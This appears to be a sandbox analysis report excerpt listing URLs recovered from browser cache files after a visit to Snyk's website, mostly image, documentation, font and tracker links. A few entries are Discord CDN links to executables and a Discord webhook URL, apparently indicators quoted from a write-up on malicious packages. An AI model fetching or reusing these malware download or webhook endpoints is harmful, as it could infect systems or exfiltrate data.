Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/jsonContent-Length: 42Connection: closeDate: Thu, 24 Oct 2024 19:49:35 GMTx-amz-apigw-id: AK6wfFk9IAMEWvA=x-amzn-RequestId: 297aaea3-bd4b-499a-a408-e649d3862938x-amzn-ErrorType: MissingAuthenticationTokenExceptionX-Cache: Error from cloudfrontVia: 1.1 13c8b9a0a39ad1238a922185ad5547fc.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA60-P10X-Amz-Cf-Id: 7fqBU8hu2tbhvip8nzGsg4TFvw48r-KochkqoTqJgJv1Ik1wXOvaJA==
Source: chromecache_328.2.dr, chromecache_515.2.dr, chromecache_520.2.dr, chromecache_400.2.drString found in binary or memory: http://creativecommons.org/ns#
Source: chromecache_626.2.dr, chromecache_279.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/f_auto/q_auto/v1628775553/wordpress-sync/graphic-support
Source: chromecache_626.2.dr, chromecache_279.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/f_auto/q_auto/v1628776196/wordpress-sync/graphic-sheets.
Source: chromecache_443.2.dr, chromecache_541.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/f_auto/q_auto/v1660040093/wordpress-sync/feature-safe-co
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/f_auto/q_auto/v1663085446/wordpress-sync/photograph-happ
Source: chromecache_522.2.dr, chromecache_512.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/f_auto/q_auto/v1668023447/illlustration-ui-full-vuln-db-
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/t_Social%20Sharing
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1607608616/Marketing%20site%20assets/snyk-code-featured
Source: chromecache_533.2.dr, chromecache_282.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1613516887/wordpress-sync/devsecops-benefits-1.png
Source: chromecache_626.2.dr, chromecache_279.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1628775553/wordpress-sync/graphic-support.svg
Source: chromecache_626.2.dr, chromecache_279.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1628776196/wordpress-sync/graphic-sheets.svg
Source: chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1645182199/snyk-marketingui/brand-logos/wordmark-logo-c
Source: chromecache_441.2.dr, chromecache_581.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646598228/wordpress-sync/illustration-serious-security
Source: chromecache_441.2.dr, chromecache_581.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599294/wordpress-sync/feature-resources-for-todays-
Source: chromecache_441.2.dr, chromecache_581.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599306/wordpress-sync/blog-feature-snyk-activecampa
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599497/wordpress-sync/image6-13.png
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599501/wordpress-sync/blog-log4shell-api.png
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599501/wordpress-sync/image-4-4.png
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599503/wordpress-sync/blog-log4shell-projects.png
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599504/wordpress-sync/blog-log4shell-search.png
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599505/wordpress-sync/blog-log4shell-dependency-tre
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599505/wordpress-sync/blog-log4shell-fix-pr.png
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599505/wordpress-sync/blog-log4shell-manual-fix.png
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599506/wordpress-sync/blog-log4shell-import.png
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599507/wordpress-sync/blog-log4shell-vuln.png
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1646599509/wordpress-sync/blog-log4shell-intellij.png
Source: chromecache_484.2.dr, chromecache_365.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1659610739/wordpress-sync/feature-presentation.jpg
Source: chromecache_443.2.dr, chromecache_541.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1660040093/wordpress-sync/feature-safe-containers.png
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663085446/wordpress-sync/photograph-happy-hour.jpg
Source: chromecache_441.2.dr, chromecache_581.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663155532/wordpress-sync/SnykLive-Day-in-Life-of-BISO-
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663712673/wordpress-sync/illustrated-ui-open-fix-reque
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663712674/wordpress-sync/illustrated-ui-snyk-code.svg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663712676/wordpress-sync/illustration-snyk-code-hero.s
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663712679/wordpress-sync/illustrated-ui-ide-call-out.s
Source: chromecache_428.2.dr, chromecache_394.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663712800/wordpress-sync/illustration-snyk-container-h
Source: chromecache_428.2.dr, chromecache_394.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663712801/wordpress-sync/illustrated-ui-snyk-container
Source: chromecache_428.2.dr, chromecache_394.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663712803/wordpress-sync/illustrated-ui-snyk-container
Source: chromecache_522.2.dr, chromecache_512.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663713048/wordpress-sync/blog-cobalt-strike-1.jpg
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663718139/wordpress-sync/blog-cworld-variabletypes.png
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1663744507/wordpress-sync/blog-mothers-day-amanda.jpg
Source: chromecache_533.2.dr, chromecache_282.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1667489040/website-illustration-ui/illustration-ui-spot
Source: chromecache_512.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1668023447/illlustration-ui-full-vuln-db-malicious-pack
Source: chromecache_522.2.dr, chromecache_512.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1669776290/hero-security-intelligence-2.svg
Source: chromecache_533.2.dr, chromecache_282.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1669820960/illustrated-ui-spot-ide-plugin.svg
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1671633594/wordpress-sync/blog-openssl-critcial-vuln-se
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1671633594/wordpress-sync/blog-openssl-critical-vuln-sn
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1671633595/wordpress-sync/blog-openssl-critical-vuln-cl
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1672705017/customer-logos/CVS_Health_logo_1.svg
Source: chromecache_533.2.dr, chromecache_282.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1674784927/illustrated-ui-spot-fix-pr-open.svg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1675822985/logocluster-developement-lifecycle.svg
Source: chromecache_484.2.dr, chromecache_365.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1676184612/feature-fedramp.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1678125740/blog-mitigating-path-traversal-jsession-id.j
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1678125740/blog-mitigating-path-traversal-snyk-code-ui.
Source: chromecache_460.2.dr, chromecache_616.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1678773524/snyk-top-10/feature-snyk-top-10-oss-2022.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1680276999/blog-mitigating-path-traversal-cwe-23.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1682439081/blog-preventing-xss-high-vulns.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1682439081/blog-preventing-xss-product-controller.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1682439081/blog-preventing-xss-snyk-code-report.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1684306020/blog-recharge-florence.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1684306021/blog-recharge-belyn-3.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1684306021/blog-recharge-tim-1.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1684306022/blog-recharge-adriana.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1684306022/blog-recharge-belyn-1.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1684306022/blog-recharge-omri.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1684306023/blog-recharge-belyn-2.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1684306023/blog-recharge-tim-2.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1684342367/blog-recharge-noa.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1685025412/blog-aapi-month-Ming.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1685025412/blog-aapi-month-Waleed.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1685025413/blog-aapi-month-Karuna.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1685025413/blog-aapi-month-Tori.jpg
Source: chromecache_533.2.dr, chromecache_282.2.dr, chromecache_599.2.dr, chromecache_419.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1686142464/illustration-ui-spot-snyk-deepcode-hybrid-ac
Source: chromecache_484.2.dr, chromecache_365.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1686163008/feature-snyk-platform-learn-using-snyk-with-
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1686741817/_DSC8286.jpg
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1686762145/SRG-Accessibility.svg
Source: chromecache_484.2.dr, chromecache_509.2.dr, chromecache_579.2.dr, chromecache_365.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1690819193/illustration-ui-spot-language-tool-converage
Source: chromecache_509.2.dr, chromecache_579.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1695820674/illustration-ui-spot-reporting-policies-issu
Source: chromecache_509.2.dr, chromecache_579.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1696443631/AI-icon.svg
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1696529493/blog-webp-fix-deps.jpg
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1696529494/blog-webp-fix-chart.jpg
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1696529494/blog-webp-fix-report.jpg
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697037268/blog-curl-vuln-filter.png
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697730906/blog-github-copilot-arrow-replace.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697730906/blog-github-copilot-elements-div0.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697730906/blog-github-copilot-elements-miro-link.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697730906/blog-github-copilot-img-onerror.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697730906/blog-github-copilot-line-331.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697730906/blog-github-copilot-onerror-_quot.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697730907/blog-github-copilot-4-steps.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697730907/blog-github-copilot-funct-escape.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1697730907/blog-github-copilot-img-onload.jpg
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1701280100/illustration-ui-apprisk-priority.svg
Source: chromecache_313.2.dr, chromecache_511.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1713534634/illustration-ui-apprisk-global-dimension-fil
Source: chromecache_313.2.dr, chromecache_511.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1713534635/illustration-ui-apprisk-prioritize-top-risks
Source: chromecache_344.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1717461856/feature-snyk-snowflake.jpg
Source: chromecache_331.2.dr, chromecache_619.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1717775643/Customer_-_Rei.png
Source: chromecache_509.2.dr, chromecache_579.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1719345707/website-heroes/background-images/hero-bg-ai-
Source: chromecache_517.2.dr, chromecache_344.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1722949777/guy-plotnik.jpg
Source: chromecache_454.2.drString found in binary or memory: http://res.cloudinary.com/snyk/image/upload/v1727870043/feature-code-rise.png
Source: chromecache_474.2.dr, chromecache_610.2.drString found in binary or memory: http://res.cloudinary.com/snyk/video/upload/v1671200169/Container_Screenie_-_long_version.mp4
Source: chromecache_474.2.dr, chromecache_610.2.drString found in binary or memory: http://res.cloudinary.com/snyk/video/upload/v1671200170/SnykApp_reporting.mp4
Source: chromecache_474.2.dr, chromecache_610.2.drString found in binary or memory: http://res.cloudinary.com/snyk/video/upload/v1671200170/marketplaces_bitbucket_cloud.mp4
Source: chromecache_509.2.dr, chromecache_579.2.drString found in binary or memory: http://res.cloudinary.com/snyk/video/upload/v1695789518/video-secure-ai-generated-code-solutions.mp4
Source: chromecache_522.2.dr, chromecache_283.2.dr, chromecache_452.2.dr, chromecache_512.2.drString found in binary or memory: http://security.snyk.io/
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: http://securitylab.github.com/advisories/GHSL-2020-032-PureFTPD/
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: http://snyk.co/uelgI
Source: chromecache_328.2.dr, chromecache_515.2.dr, chromecache_520.2.dr, chromecache_400.2.drString found in binary or memory: http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd
Source: chromecache_328.2.dr, chromecache_515.2.dr, chromecache_520.2.dr, chromecache_400.2.drString found in binary or memory: http://www.inkscape.org/)
Source: chromecache_328.2.dr, chromecache_515.2.dr, chromecache_520.2.dr, chromecache_400.2.drString found in binary or memory: http://www.inkscape.org/namespaces/inkscape
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: https://0xrick.github.io/binary-exploitation/bof1/#protostar-stack0
Source: chromecache_593.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: https://aibusiness.com/companies/one-year-on-github-copilot-adoption-soars
Source: chromecache_262.2.dr, chromecache_421.2.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: chromecache_512.2.drString found in binary or memory: https://api.npmjs.org/downloads
Source: chromecache_540.2.drString found in binary or memory: https://app.snyk.io
Source: chromecache_283.2.dr, chromecache_533.2.dr, chromecache_282.2.dr, chromecache_434.2.dr, chromecache_452.2.dr, chromecache_506.2.drString found in binary or memory: https://app.snyk.io/auth/auth0/bitbucket
Source: chromecache_283.2.dr, chromecache_533.2.dr, chromecache_282.2.dr, chromecache_434.2.dr, chromecache_452.2.dr, chromecache_506.2.dr, chromecache_599.2.dr, chromecache_419.2.drString found in binary or memory: https://app.snyk.io/auth/auth0/github
Source: chromecache_283.2.dr, chromecache_533.2.dr, chromecache_282.2.dr, chromecache_434.2.dr, chromecache_452.2.dr, chromecache_506.2.dr, chromecache_599.2.dr, chromecache_419.2.drString found in binary or memory: https://app.snyk.io/auth/auth0/google-oauth2
Source: chromecache_283.2.dr, chromecache_533.2.dr, chromecache_282.2.dr, chromecache_434.2.dr, chromecache_452.2.dr, chromecache_506.2.drString found in binary or memory: https://app.snyk.io/auth/auth0/waad
Source: chromecache_283.2.dr, chromecache_533.2.dr, chromecache_282.2.dr, chromecache_434.2.dr, chromecache_452.2.dr, chromecache_506.2.drString found in binary or memory: https://app.snyk.io/auth/docker
Source: chromecache_522.2.dr, chromecache_321.2.dr, chromecache_512.2.drString found in binary or memory: https://app.snyk.io/login
Source: chromecache_283.2.dr, chromecache_533.2.dr, chromecache_282.2.dr, chromecache_434.2.dr, chromecache_452.2.dr, chromecache_506.2.drString found in binary or memory: https://app.snyk.io/login/sso
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://app.snyk.io/login?cta=sign-up
Source: chromecache_321.2.drString found in binary or memory: https://app.snyk.io/signup
Source: chromecache_582.2.dr, chromecache_483.2.drString found in binary or memory: https://assets.trendemon.com/tag/trends.min.js
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: https://basecamp.com/shapeup
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: https://blog.pragmaticengineer.com/project-management-at-big-tech/
Source: chromecache_333.2.dr, chromecache_437.2.dr, chromecache_602.2.dr, chromecache_300.2.dr, chromecache_448.2.dr, chromecache_388.2.dr, chromecache_557.2.dr, chromecache_546.2.dr, chromecache_604.2.dr, chromecache_532.2.dr, chromecache_598.2.dr, chromecache_593.2.drString found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_522.2.dr, chromecache_512.2.drString found in binary or memory: https://cdn.discordapp.com/attachments/1003368479442874518/1003368773983682592/ZYRBX.exe
Source: chromecache_522.2.dr, chromecache_512.2.drString found in binary or memory: https://cdn.discordapp.com/attachments/1003368479442874518/1003368774335991898/ZYXMN.exe
Source: chromecache_261.2.dr, chromecache_544.2.drString found in binary or memory: https://conversation.api.drift.com
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://curl.se/changes.html#0_1
Source: chromecache_261.2.dr, chromecache_544.2.drString found in binary or memory: https://customer.api.drift.com
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: https://cwe.mitre.org/data/definitions/121.html
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: https://cwe.mitre.org/data/definitions/125.html
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: https://cwe.mitre.org/data/definitions/190.html
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: https://cwe.mitre.org/data/definitions/191.html
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: https://cwe.mitre.org/data/definitions/416.html
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: https://cwe.mitre.org/data/definitions/476.html
Source: chromecache_385.2.dr, chromecache_556.2.drString found in binary or memory: https://cwe.mitre.org/data/definitions/787.html
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/
Source: chromecache_473.2.dr, chromecache_299.2.dr, chromecache_399.2.dr, chromecache_486.2.drString found in binary or memory: https://developers.marketo.com/MunchkinLicense.pdf
Source: chromecache_512.2.drString found in binary or memory: https://discord.com/api/webhooks/1003603061530431539/mAOhFLrtafsu1jC3G1_nRR5by1zBTtd4xxdxZPVFkOlCUqM
Source: chromecache_522.2.dr, chromecache_512.2.drString found in binary or memory: https://docs.couchdb.org/en/3.2.0/api/database/changes.html
Source: chromecache_321.2.drString found in binary or memory: https://docs.snyk.io/
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/features/fixing-and-prioritizing-issues/starting-to-fix-vulnerabilities/snyk-pr
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/features/integrations/git-repository-scm-integrations
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/features/integrations/ide-tools
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/features/snyk-cli
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/features/snyk-cli/guides-for-our-cli/getting-started-with-the-cli
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/features/snyk-cli/secure-your-projects-in-the-long-term/monitor-your-projects-a
Source: chromecache_412.2.dr, chromecache_627.2.drString found in binary or memory: https://docs.snyk.io/features/user-and-group-management/managing-settings/usage-page-details
Source: chromecache_474.2.dr, chromecache_610.2.drString found in binary or memory: https://docs.snyk.io/getting-started/supported-languages-and-frameworks
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: https://docs.snyk.io/getting-started/supported-languages-frameworks-and-feature-availability-overvie
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: https://docs.snyk.io/ide-tools/jetbrains-plugins
Source: chromecache_474.2.dr, chromecache_610.2.drString found in binary or memory: https://docs.snyk.io/integrate-with-snyk
Source: chromecache_474.2.dr, chromecache_610.2.drString found in binary or memory: https://docs.snyk.io/integrate-with-snyk/snyk-container-integrations/container-security-with-docker-
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: https://docs.snyk.io/integrations
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: https://docs.snyk.io/integrations/ci-cd-integrations
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/manage-risk/reporting
Source: chromecache_412.2.dr, chromecache_627.2.drString found in binary or memory: https://docs.snyk.io/manage-risk/snyk-apprisk/how-does-snyk-count-assets
Source: chromecache_412.2.dr, chromecache_627.2.drString found in binary or memory: https://docs.snyk.io/more-info/how-snyk-handles-your-data
Source: chromecache_460.2.dr, chromecache_616.2.drString found in binary or memory: https://docs.snyk.io/products/snyk-cloud#unified-policy-engine
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: https://docs.snyk.io/products/snyk-code
Source: chromecache_428.2.dr, chromecache_394.2.drString found in binary or memory: https://docs.snyk.io/products/snyk-container
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/products/snyk-open-source/open-source-basics/fixing-vulnerabilities
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: https://docs.snyk.io/scan-application-code/snyk-code
Source: chromecache_488.2.dr, chromecache_540.2.drString found in binary or memory: https://docs.snyk.io/scan-application-code/snyk-code/exploring-and-working-with-the-snyk-code-result
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/scan-applications/snyk-container/how-snyk-container-works/supported-operating-s
Source: chromecache_474.2.dr, chromecache_385.2.dr, chromecache_260.2.dr, chromecache_556.2.dr, chromecache_612.2.dr, chromecache_610.2.drString found in binary or memory: https://docs.snyk.io/snyk-cli
Source: chromecache_260.2.dr, chromecache_612.2.drString found in binary or memory: https://docs.snyk.io/tutorials/springone-workshop/snyk-oss-for-developers/project-remediation-advice
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: https://finnern.com/about/
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/bigshouldersdisplay/v21/fC1_PZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1cw9DuHpM.woff
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/bigshouldersdisplay/v21/fC1_PZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1cwtDuHpM.woff
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/bigshouldersdisplay/v21/fC1_PZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1czNDu.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1JlFc-K.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmr19VF9eO.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmr19VGdeOcEg.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmy15VF9eO.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmy15VGdeOcEg.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJfecg.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJnecmNE.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiGyp8kv8JHgFVrJJLucHtA.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiGyp8kv8JHgFVrJJLufntAKPY.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc-CsTKlA.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc0CsTKlA.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc1CsTKlA.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc2CsTKlA.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc3CsTKlA.woff2)
Source: chromecache_628.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc5CsTKlA.woff2)
